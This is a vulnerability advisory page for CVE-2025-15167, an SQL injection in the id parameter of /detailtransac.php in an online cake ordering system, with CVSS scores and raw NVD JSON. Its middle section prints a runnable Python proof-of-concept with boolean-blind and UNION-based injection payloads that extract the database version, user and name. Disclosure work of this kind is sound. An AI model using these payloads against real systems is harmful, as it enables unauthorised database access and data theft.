Security Vulnerability Report
中文
CVE-2025-15167 CVSS 7.3 HIGH

CVE-2025-15167

Published: 2025-12-29 03:15:42
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was determined in itsourcecode Online Cake Ordering System 1.0. This impacts an unknown function of the file /detailtransac.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:admerc:online_cake_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Online Cake Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-15167 SQL Injection PoC # Target: itsourcecode Online Cake Ordering System 1.0 # Vulnerability: SQL Injection in /detailtransac.php ID parameter def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in detailtransac.php """ # Construct malicious URL with SQL injection payload vuln_url = f"{target_url}/detailtransac.php?id={payload}" try: response = requests.get(vuln_url, timeout=10) return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def test_boolean_blind_injection(target_url): """ Test for boolean-based blind SQL injection """ # True condition payload true_payload = "1' AND 1=1 -- -" # False condition payload false_payload = "1' AND 1=2 -- -" print(f"[*] Testing boolean blind injection...") true_resp = exploit_sqli(target_url, true_payload) false_resp = exploit_sqli(target_url, false_payload) if true_resp and false_resp and true_resp != false_resp: print("[+] Boolean blind injection confirmed!") return True return False def extract_database_info(target_url): """ Extract database information using UNION-based injection """ # Database version payload version_payload = "1' UNION SELECT NULL,@@version,NULL,NULL,NULL -- -" # Current user payload user_payload = "1' UNION SELECT NULL,user(),NULL,NULL,NULL -- -" # Database name payload db_payload = "1' UNION SELECT NULL,database(),NULL,NULL,NULL -- -" print("[*] Extracting database information...") version_result = exploit_sqli(target_url, version_payload) if version_result: print(f"[+] Database version information retrieved") return version_result if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-15167.py <target_url>") print("Example: python cve-2025-15167.py http://target.com/cakeshop") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Target: {target}") print(f"[*] CVE-2025-15167 SQL Injection PoC") # Test vulnerability test_boolean_blind_injection(target) # Extract information extract_database_info(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15167", "sourceIdentifier": "[email protected]", "published": "2025-12-29T03:15:41.660", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in itsourcecode Online Cake Ordering System 1.0. This impacts an unknown function of the file /detailtransac.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admerc:online_cake_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6990FB82-E8CB-4B16-B293-4DDDF0627D47"}]}]}], "references": [{"url": "https://github.com/LaneyYu/cve/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.338546", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338546", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721109", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.